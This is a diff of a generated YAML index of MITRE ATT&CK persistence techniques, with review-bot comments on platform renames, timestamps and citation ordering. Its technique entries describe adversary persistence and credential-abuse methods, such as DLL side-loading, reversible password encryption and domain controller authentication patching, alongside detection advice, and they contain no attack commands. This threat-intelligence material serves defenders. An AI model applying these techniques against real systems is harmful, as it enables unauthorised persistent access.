name: 'Event Triggered Execution: AppInit DLLs'
description: "Adversaries may establish persistence and/or elevate privileges
by executing malicious content triggered by AppInit DLLs loaded into processes.
@@ -34716,7 +35115,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.010
atomic_tests: []
T1546.002:
@@ -34781,18 +35179,17 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.002
atomic_tests: []
T1556.009:
technique:
- modified: '2024-04-18T20:53:46.175Z'
+ modified: '2024-09-16T16:54:47.595Z'
name: Conditional Access Policies
description: "Adversaries may disable or modify conditional access policies
to enable persistent access to compromised accounts. Conditional access policies
are additional verifications used by identity providers and identity and access
management systems to determine whether a user should be granted access to
- a resource.\n\nFor example, in Azure AD, Okta, and JumpCloud, users can be
+ a resource.\n\nFor example, in Entra ID, Okta, and JumpCloud, users can be
denied access to applications based on their IP address, device enrollment
status, and use of multi-factor authentication.(Citation: Microsoft Conditional
Access)(Citation: JumpCloud Conditional Access Policies)(Citation: Okta Conditional
@@ -34825,10 +35222,9 @@ persistence:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Azure AD
- - SaaS
- IaaS
- x_mitre_version: '1.0'
+ - Identity Provider
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Modification'
- 'Cloud Service: Cloud Service Modification'
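Review bot: the T1556.009 platform list drops both `Azure AD` and `SaaS` and adds `Identity Provider`, leaving `IaaS` and `Identity Provider`. The previous hunk changed the description from "Azure AD" to "Entra ID" but still names Okta and JumpCloud as examples, which were previously covered by the `SaaS` platform; the new `Identity Provider` platform covers them, so this is consistent, but the version bump 1.0 to 1.1 is the only signal of that reclassification. If any other artifact in this repository indexes techniques by the old platform names (`Azure AD`, `SaaS` for identity providers), it needs the same rename in the same change.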
@@ -34865,7 +35261,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1543.001:
technique:
@@ -34939,7 +35334,7 @@ persistence:
benign software. Launch Agents are created with user level privileges and
execute with user level permissions.(Citation: OSX Malware Detection)(Citation:
OceanLotus for OS X) "
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-21T16:13:00.598Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Create or Modify System Process: Launch Agent'
x_mitre_detection: "Monitor Launch Agent creation through additional plist files
@@ -34967,12 +35362,11 @@ persistence:
- User
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1543.001
atomic_tests: []
T1505:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-19T21:18:29.349Z'
name: Server Software Component
description: 'Adversaries may abuse legitimate extensible development features
of servers to establish persistent access to systems. Enterprise server applications
@@ -35031,33 +35425,10 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1556.001:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
- type: attack-pattern
- created: '2020-02-11T19:05:02.399Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1556.001
- url: https://attack.mitre.org/techniques/T1556/001
- - source_name: Dell Skeleton
- description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
- Retrieved April 8, 2019.
- url: https://www.secureworks.com/research/skeleton-key-malware-analysis
- - url: https://technet.microsoft.com/en-us/library/dn487457.aspx
- description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
- June 3, 2016.
- source_name: TechNet Audit Policy
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-08-21T15:26:54.386Z'
name: Domain Controller Authentication
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
@@ -35078,6 +35449,7 @@ persistence:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: "Monitor for calls to OpenProcess
that can be
used to manipulate lsass.exe running on a domain controller as well as for
malicious modifications to functions exported from authentication-related
@@ -35092,52 +35464,42 @@ persistence:
used to execute binaries on a remote system as a particular account. Correlate
other security systems with login information (e.g. a user has an active login
session but has not entered the building or does not have VPN access). "
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '2.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Process: Process Access'
- 'File: File Modification'
- 'Process: OS API Execution'
- x_mitre_permissions_required:
- - Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
- atomic_tests: []
- T1556.005:
- technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
type: attack-pattern
- created: '2022-01-13T20:02:28.349Z'
+ id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
+ created: '2020-02-11T19:05:02.399Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1556.005
- url: https://attack.mitre.org/techniques/T1556/005
- - source_name: store_pwd_rev_enc
- url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
- description: Microsoft. (2021, October 28). Store passwords using reversible
- encryption. Retrieved January 3, 2022.
- - source_name: how_pwd_rev_enc_1
- url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
- description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
- encryption: how it works (part 1). Retrieved November 17, 2021.'
- - source_name: how_pwd_rev_enc_2
- url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
- description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
- encryption: how it works (part 2). Retrieved November 17, 2021.'
- - source_name: dump_pwd_dcsync
- url: https://adsecurity.org/?p=2053
- description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
- All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
- modified: '2022-05-11T14:00:00.188Z'
+ url: https://attack.mitre.org/techniques/T1556/001
+ external_id: T1556.001
+ - source_name: Dell Skeleton
+ description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
+ Retrieved April 8, 2019.
+ url: https://www.secureworks.com/research/skeleton-key-malware-analysis
+ - source_name: TechNet Audit Policy
+ description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
+ June 3, 2016.
+ url: https://technet.microsoft.com/en-us/library/dn487457.aspx
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1556.005:
+ technique:
+ modified: '2024-08-26T15:40:31.871Z'
name: Reversible Encryption
description: |-
An adversary may abuse Active Directory authentication encryption properties to gain access to credentials on Windows systems. The AllowReversiblePasswordEncryption
property specifies whether reversible password encryption for an account is enabled or disabled. By default this property is disabled (instead storing user credentials as the output of one-way hashing functions) and should not be enabled unless legacy or other software require it.(Citation: store_pwd_rev_enc)
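Review bot: this hunk interleaves the tail of T1556.001 with the head of T1556.005: the lines `atomic_tests: []`, `T1556.005:` and `technique:` are deleted in the middle of the hunk and re-added just before `modified: '2024-08-26T15:40:31.871Z'`, and the `type: attack-pattern` line of T1556.005 is shown as unchanged context while T1556.001's `id` and `created` lines are added around it. The resulting file is correct (T1556.001 gains `revoked: false`, `x_mitre_deprecated: false`, `x_mitre_attack_spec_version: 3.2.0`, version 2.0 to 2.1; T1556.005's four citations are re-added in a new order), but the hunk is hard to verify by eye. Regenerating the patch with `git diff --indent-heuristic` or `--diff-algorithm=patience` would align the block boundaries; for the T1556.005 citations, check that `store_pwd_rev_enc`, `how_pwd_rev_enc_1`, `how_pwd_rev_enc_2` and `dump_pwd_dcsync` all survive (they do in this hunk and the next).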
@@ -35159,6 +35521,7 @@ persistence:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: "Monitor property changes in Group Policy: Computer
Configuration\\Windows Settings\\Security Settings\\Account Policies\\Password
Policy\\Store passwords using reversible encryption
. By default, the
@@ -35169,23 +35532,50 @@ persistence:
Directory PowerShell modules, such as Set-ADUser
and Set-ADAccountControl
,
that change account configurations. \n\nMonitor Fine-Grained Password Policies
and regularly audit user accounts and group settings.(Citation: dump_pwd_dcsync)"
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Modification'
- 'Command: Command Execution'
- 'User Account: User Account Metadata'
- 'Script: Script Execution'
- x_mitre_permissions_required:
- - User
- - Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
+ created: '2022-01-13T20:02:28.349Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1556/005
+ external_id: T1556.005
+ - source_name: dump_pwd_dcsync
+ description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
+ All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
+ url: https://adsecurity.org/?p=2053
+ - source_name: store_pwd_rev_enc
+ description: Microsoft. (2021, October 28). Store passwords using reversible
+ encryption. Retrieved January 3, 2022.
+ url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
+ - source_name: how_pwd_rev_enc_1
+ description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
+ encryption: how it works (part 1). Retrieved November 17, 2021.'
+ url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
+ - source_name: how_pwd_rev_enc_2
+ description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
+ encryption: how it works (part 2). Retrieved November 17, 2021.'
+ url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1546.016:
technique:
- modified: '2024-04-12T02:23:44.583Z'
+ modified: '2024-04-28T15:52:44.332Z'
name: Installer Packages
description: |-
Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Installer packages are OS specific and contain the resources an operating system needs to install applications on a system. Installer packages can include scripts that run prior to installation as well as after installation is complete. Installer scripts may inherit elevated permissions when executed. Developers often use these scripts to prepare the environment for installation, check requirements, download dependencies, and remove files after installation.(Citation: Installer Package Scripting Rich Trouton)
@@ -35202,7 +35592,7 @@ persistence:
phase_name: persistence
x_mitre_contributors:
- Brandon Dalton @PartyD0lphin
- - Alexander Rodchenko
+ - Rodchenko Aleksandr
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
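Review bot: the contributor entry for T1546.016 changes from `Alexander Rodchenko` to `Rodchenko Aleksandr`, which alters both the name order (surname first) and the transliteration. `x_mitre_contributors` is attribution data that comes from the upstream ATT&CK object, so this should match the source bundle exactly rather than being edited locally; if it does match upstream, no action is needed, otherwise revert to the upstream spelling.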
@@ -35261,7 +35651,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1037.004:
technique:
@@ -35343,7 +35732,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1037.004
atomic_tests: []
T1543.002:
@@ -35458,12 +35846,11 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1543.002
atomic_tests: []
T1136:
technique:
- modified: '2024-01-31T20:46:43.215Z'
+ modified: '2024-10-15T15:53:21.895Z'
name: Create Account
description: |-
Adversaries may create an account to maintain access to victim systems.(Citation: Symantec WastedLocker June 2020) With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.
@@ -35486,16 +35873,15 @@ persistence:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- IaaS
- Linux
- macOS
- - Google Workspace
- Network
- Containers
- SaaS
- x_mitre_version: '2.4'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.5'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'Command: Command Execution'
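Review bot: The `x_mitre_platforms` rename in this hunk (`- Azure AD`, `- Office 365` and `- Google Workspace` replaced by `- Office Suite` and `- Identity Provider`, with `x_mitre_version` bumped 2.4 → 2.5) tracks the ATT&CK v16 platform consolidation, but any per-platform index derived from these values will silently lose T1136 under the old platform names. Regenerate the derived indexes in the same change so that files keyed on the retired platform names do not go stale or keep phantom entries.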
@@ -35522,7 +35908,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1547.013:
technique:
@@ -35591,7 +35976,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1547.007:
technique:
@@ -35627,7 +36011,7 @@ persistence:
Adversaries may modify plist files to automatically run an application when a user logs in. When a user logs out or restarts via the macOS Graphical User Interface (GUI), a prompt is provided to the user with a checkbox to "Reopen windows when logging back in".(Citation: Re-Open windows on Mac) When selected, all applications currently open are added to a property list file named com.apple.loginwindow.[UUID].plist
within the ~/Library/Preferences/ByHost
directory.(Citation: Methods of Mac Malware Persistence)(Citation: Wardle Persistence Chapter) Applications listed in this file are automatically reopened upon the user’s next logon.
Adversaries can establish [Persistence](https://attack.mitre.org/tactics/TA0003) by adding a malicious application path to the com.apple.loginwindow.[UUID].plist
file to execute payloads when a user logs in.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-19T23:46:56.443Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Boot or Logon Autostart Execution: Re-opened Applications'
x_mitre_detection: Monitoring the specific plist files associated with reopening
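Review bot: `modified` moves backwards here ('2022-05-11T14:00:00.188Z' → '2022-04-19T23:46:56.443Z'), and the same happens for T1574.002, T1037.001, T1547.008, T1546.007, T1556.004, T1574.004, T1574.012 and T1205.002 further down. A timestamp getting older on regeneration usually means the generator switched from a collection-level bundle date to the object's own upstream `modified`; if that is the case, state it in the PR description, because anyone diffing index snapshots by `modified` to find changed techniques will otherwise read these as regressions rather than as a change of source.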
@@ -35646,12 +36030,11 @@ persistence:
- User
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.007
atomic_tests: []
T1574.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:47.241Z'
name: 'Hijack Execution Flow: DLL Side-Loading'
description: |-
Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
@@ -35701,12 +36084,11 @@ persistence:
url: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1574.002
atomic_tests: []
T1098.002:
technique:
- modified: '2024-01-03T15:46:06.706Z'
+ modified: '2024-10-15T15:37:25.303Z'
name: 'Account Manipulation: Additional Email Delegate Permissions'
description: "Adversaries may grant additional permission levels to maintain
persistent access to an adversary-controlled email account. \n\nFor example,
@@ -35739,9 +36121,10 @@ persistence:
x_mitre_contributors:
- Microsoft Detection and Response Team (DART)
- Mike Burns, Mandiant
- - Naveen Vijayaraghavan, Nilesh Dherange (Gurucul)
- Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
- Arad Inbar, Fidelis Security
+ - Nilesh Dherange (Gurucul)
+ - Naveen Vijayaraghavan
x_mitre_deprecated: false
x_mitre_detection: "Monitor for unusual Exchange and Office 365 email account
permissions changes that may indicate excessively broad permissions being
@@ -35758,9 +36141,8 @@ persistence:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- - Office 365
- - Google Workspace
- x_mitre_version: '2.1'
+ - Office Suite
+ x_mitre_version: '2.2'
x_mitre_data_sources:
- 'Group: Group Modification'
- 'Application Log: Application Log Content'
@@ -35806,12 +36188,11 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1098.002
atomic_tests: []
T1653:
technique:
- modified: '2023-09-30T21:28:45.038Z'
+ modified: '2024-10-16T20:11:40.334Z'
name: Power Settings
description: |-
Adversaries may impair a system's ability to hibernate, reboot, or shut down in order to extend access to infected machines. When a computer enters a dormant state, some or all software and hardware may cease to operate which can disrupt malicious activity.(Citation: Sleep, shut down, hibernate)
@@ -35825,7 +36206,7 @@ persistence:
- kill_chain_name: mitre-attack
phase_name: persistence
x_mitre_contributors:
- - Goldstein Menachem
+ - Menachem Goldstein
- Juan Tapiador
x_mitre_deprecated: false
x_mitre_detection: "Command-line invocation of tools capable of modifying services
@@ -35884,7 +36265,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1037.001:
technique:
@@ -35910,7 +36290,7 @@ persistence:
url: http://www.hexacorn.com/blog/2014/11/14/beyond-good-ol-run-key-part-18/
description: Hexacorn. (2014, November 14). Beyond good ol’ Run key, Part
18. Retrieved November 15, 2019.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-24T23:45:03.153Z'
name: 'Boot or Logon Initialization Scripts: Logon Script (Windows)'
description: "Adversaries may use Windows logon scripts automatically executed
at logon initialization to establish persistence. Windows allows logon scripts
@@ -35936,13 +36316,11 @@ persistence:
- 'Command: Command Execution'
- 'Process: Process Creation'
- 'Windows Registry: Windows Registry Key Creation'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1037.001
atomic_tests: []
T1137.002:
technique:
- modified: '2024-04-16T12:41:55.175Z'
+ modified: '2024-10-15T16:01:48.325Z'
name: 'Office Application Startup: Office Test'
description: |-
Adversaries may abuse the Microsoft Office "Office Test" Registry key to obtain persistence on a compromised system. An Office Test Registry location exists that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started. This Registry key is thought to be used by Microsoft to load DLLs for testing and debugging purposes while developing Office applications. This Registry key is not created by default during an Office installation.(Citation: Hexacorn Office Test)(Citation: Palo Alto Office Test Sofacy)
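Review bot: For T1037.001 this hunk removes both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` without adding anything back, so the object is left with no spec-version marker at all, unlike the other techniques in this diff, which keep or gain `x_mitre_attack_spec_version: 3.2.0`. T1556.004 and T1574.012 get the same treatment below. Check whether the upstream STIX objects really lack the field or whether the generator is dropping it for objects that carry the older 2.1.0 value.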
@@ -35966,8 +36344,8 @@ persistence:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- - Office 365
- x_mitre_version: '1.2'
+ - Office Suite
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Creation'
- 'Command: Command Execution'
@@ -35997,7 +36375,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1137.002
atomic_tests: []
T1547.008:
@@ -36040,7 +36417,7 @@ persistence:
Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process.(Citation: Microsoft Security Subsystem)
Adversaries may target LSASS drivers to obtain persistence. By either replacing or adding illegitimate drivers (e.g., [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574)), an adversary can use LSA operations to continuously execute malicious payloads.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T16:34:43.405Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Boot or Logon Autostart Execution: LSASS Driver'
x_mitre_detection: "With LSA Protection enabled, monitor the event logs (Events
@@ -36065,12 +36442,11 @@ persistence:
- Administrator
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.008
atomic_tests: []
T1078.004:
technique:
- modified: '2024-03-29T15:42:13.499Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Valid Accounts: Cloud Accounts'
description: "Valid accounts in cloud environments may allow adversaries to
perform actions to achieve Initial Access, Persistence, Privilege Escalation,
@@ -36110,8 +36486,10 @@ persistence:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Jon Sternstein, Stern Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: Monitor the activity of cloud accounts to detect abnormal
or malicious behavior, such as accessing information outside of the normal
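Review bot: `x_mitre_attack_spec_version: 3.2.0` is inserted after `kill_chain_phases` here, while the same key (together with `x_mitre_modified_by_ref`) is deleted from its old position after `object_marking_refs` later in the T1078.004 block; this is a pure key reorder that makes the hunk look as if a field were added. If the generator does not already sort keys, emitting them in a fixed order would stop future regenerations from producing this kind of noise. The new contributor line `- Arun Seelagan, CISA` is the only real change in this hunk.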
@@ -36119,13 +36497,13 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Azure AD
- - Office 365
- SaaS
- IaaS
- - Google Workspace
- x_mitre_version: '1.7'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.8'
x_mitre_data_sources:
- 'User Account: User Account Authentication'
- 'Logon Session: Logon Session Metadata'
@@ -36156,17 +36534,14 @@ persistence:
url: https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.004
atomic_tests: []
T1053.002:
technique:
- modified: '2023-11-15T14:38:10.876Z'
+ modified: '2024-10-12T15:53:12.333Z'
name: 'Scheduled Task/Job: At'
description: |-
- Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group.
+ Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group. In addition to explicitly running the `at` command, adversaries may also schedule a task with [at](https://attack.mitre.org/software/S0110) by directly leveraging the [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) `Win32_ScheduledJob` WMI class.(Citation: Malicious Life by Cybereason)
On Linux and macOS, [at](https://attack.mitre.org/software/S0110) may be invoked by the superuser as well as any users added to the at.allow
file. If the at.allow
file does not exist, the at.deny
file is checked. Every username not listed in at.deny
is allowed to invoke [at](https://attack.mitre.org/software/S0110). If the at.deny
exists and is empty, global use of [at](https://attack.mitre.org/software/S0110) is permitted. If neither file exists (which is often the baseline) only the superuser is allowed to use [at](https://attack.mitre.org/software/S0110).(Citation: Linux at)
@@ -36229,7 +36604,7 @@ persistence:
- Windows
- Linux
- macOS
- x_mitre_version: '2.2'
+ x_mitre_version: '2.3'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Scheduled Job: Scheduled Job Creation'
@@ -36263,8 +36638,8 @@ persistence:
url: https://man7.org/linux/man-pages/man1/at.1p.html
- source_name: Twitter Leoloobeek Scheduled Task
description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
- December 12, 2017.
- url: https://twitter.com/leoloobeek/status/939248813465853953
+ September 12, 2024.
+ url: https://x.com/leoloobeek/status/939248813465853953
- source_name: Microsoft Scheduled Task Events Win10
description: Microsoft. (2017, May 28). Audit Other Object Access Events.
Retrieved June 27, 2019.
@@ -36273,6 +36648,10 @@ persistence:
description: Microsoft. (n.d.). General Task Registration. Retrieved December
12, 2017.
url: https://technet.microsoft.com/library/dd315590.aspx
+ - source_name: Malicious Life by Cybereason
+ description: Philip Tsukerman. (n.d.). No Win32 Process Needed | Expanding
+ the WMI Lateral Movement Arsenal. Retrieved June 19, 2024.
+ url: https://www.cybereason.com/blog/wmi-lateral-movement-win32#blog-subscribe
- source_name: TechNet Autoruns
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
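Review bot: The new `Malicious Life by Cybereason` reference URL ends in `#blog-subscribe`, which is a page-widget fragment rather than an anchor into the article. This mirrors the upstream ATT&CK citation, so it should not be hand-edited in a generated file, but it is worth reporting upstream. The `source_name` does match the `(Citation: Malicious Life by Cybereason)` tag added to the T1053.002 description earlier in this diff, so the new description text resolves its citation.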
@@ -36285,12 +36664,11 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.002
atomic_tests: []
T1556:
technique:
- modified: '2024-04-11T21:51:44.851Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Modify Authentication Process
description: |-
